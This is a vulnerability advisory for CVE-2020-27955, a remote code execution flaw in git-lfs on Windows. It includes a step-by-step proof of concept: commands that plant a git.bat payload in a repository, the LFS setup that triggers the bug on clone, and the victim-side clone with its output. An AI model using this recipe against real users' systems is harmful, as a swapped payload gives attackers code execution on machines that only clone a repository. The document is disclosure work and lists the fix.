=============================================
- Discovered by: Dawid Golunski (@dawid_golunski)
- dawid[at]legalhackers.com
- https://legalhackers.com
- https://exploitbox.io

- CVE-2020-27955
- Release date: 04.11.2020
- Revision 1.0
- Severity: Critical
=============================================


I. VULNERABILITY
-------------------------

Git <= 2.29.2 - Remote Code Execution (RCE) via git-lfs


II. BACKGROUND
-------------------------


Git

"Git is a free and open source distributed version control system designed to 
handle everything from small to very large projects with speed and efficiency.

https://git-scm.com/


--


Git LFS

"An open source Git extension for versioning large files

Git Large File Storage (LFS) replaces large files such as audio samples, 
videos, datasets, and graphics with text pointers inside Git, while 
storing the file contents on a remote server like GitHub.com or GitHub 
Enterprise."

https://git-lfs.github.com/



III. INTRODUCTION
-------------------------


Git in versions <= 2.29.2 includes git-lfs extension which allows remote 
attackers to execute arbitrary code on the victim's Windows system upon a
clone operation.



IV. DESCRIPTION 
-------------------------


Due to the vulnerability in git-lfs described at:


Git-LFS <= 2.12 RCE Exploit



Attackers may be able to plant a backdoor in the root directory of a malicious 
repository by simply adding an executable file named as: 

- git.bat
- git.exe
- git.cmd 
- git.vbs

or any other executable extension available on the target Windows system 
(PATHEXT environment variable dependent).

As a result, the malicious git binary will get executed automatically
instead of the original git binary located in a trusted path.



V. PROOF OF CONCEPT
-------------------------


A git-lfs PoC exploit for git may be prepared with the following steps:



Attacker:

On a separate linux system (to prevent execution on the localhost on commit):


1. Create a new repository:

    mkdir git-lfs-RCE-exploit
    cd git-lfs-RCE-exploit
    git init


2. Prepare a malicious executable. E.g: git.bat with the following contents:

    @echo hacked > GITHACKED


3. Add the executable to the repository:

    git add git.bat


4. Add LFS file entries to the repository. This is necessary to trigger 
the vulnerable git-lfs extension when the repository is cloned and processed
by the main git process.

    git lfs track "*.dat"
    git add .gitattributes

    echo "git exploit PoC" > big-bug-lfs-file.dat
    git add big-bug-lfs-file.dat


5. Commit both the exploit and the lfs files:

    git commit -a -m "Big Data, powered by Git LFS & the git-lfs exploit"
    

6. Push the changes to the repository:

    git remote add origin https://github.com/some-user-name/lfspoc
    git push -u origin master



Victim:

On windows, run powershell.exe shell and clone the PoC repo:

    git clone https://github.com/some-user-name/lfspoc .

At this point the malicious executable (git.bat) will be downloaded into the repo's directory
and automatically executed by the git-lfs extension without any user interaction. 


As a result, 'GITHACKED' file should appear in the repo's directory 
To check, type:

    dir 




Alternatively, a demo repository with a plain-text bat file located at
https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955.git
can be used as follows:

C:\Users\victim> git clone https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955.git .

Cloning into '.'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 24 (delta 5), reused 17 (delta 1), pack-reused 0
Receiving objects: 100% (24/24), done.
Resolving deltas: 100% (5/5), done.
...

C:\Users\victim> type GITHACKED
hacked








VI. BUSINESS IMPACT
-------------------------

The vulnerability can lead to a full compromise of the victim's system as
attackers can execute arbitrary commands remotely without the knowledge of the
victim. 

Due to the critical severity, affected users and product vendors should update 
to the latest git-lfs version as soon as possible as the vulnerability is
trivial to exploit.

 
VII. SYSTEMS AFFECTED
-------------------------

Git <= 2.29.2 on Windows systems (Windows Server 2019, Windows 10
 Pro etc.) with a default installation of git Windows package which 
has git-lfs extension in versions <= 2.12 installed.


VIII. SOLUTION
-------------------------

This Remote Code Execution vulnerability was reported to git-lfs vendor who 
issued a patched release on the official website linked below. 

Alternatively, the latest git release which contains the patched version of 
git-lfs may be installed instead.

 
IX. REFERENCES
-------------------------

https://git-lfs.github.com/

https://git-scm.com/

https://github.com/git-lfs/git-lfs


git-lfs vuln advisory (CVE-2020-27955)

Git RCE Exploit PoC (CVE-2020-27955)


PoC repository with Bat/powershell exploit:
Git-lfs RCE exploit PoC repository (Bat/powershell)

PoC repository with Go version of the exploit (git.exe):
Git-lfs RCE exploit PoC repository (Go)

https://legalhackers.com

https://ExploitBox.io



Demos for other clients can also be viewed at:

Git LFS RCE

Visual Studio Code / VS Git-LFS RCE Exploit CVE-2020-27955

GitKraken Git-LFS RCE Exploit CVE-2020-27955

SmartGit Git-LFS RCE Exploit CVE-2020-27955

GitHub Desktop Git-LFS RCE Exploit CVE-2020-27955




X. CREDITS
-------------------------

Discovered by

Dawid Golunski
dawid (at) legalhackers (dot) com

https://legalhackers.com
https://twitter.com/dawid_golunski

https://ExploitBox.io
https://twitter.com/Exploit_Box

XI. REVISION HISTORY
-------------------------

04.11.2020 - Advisory released, rev. 1
 
XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.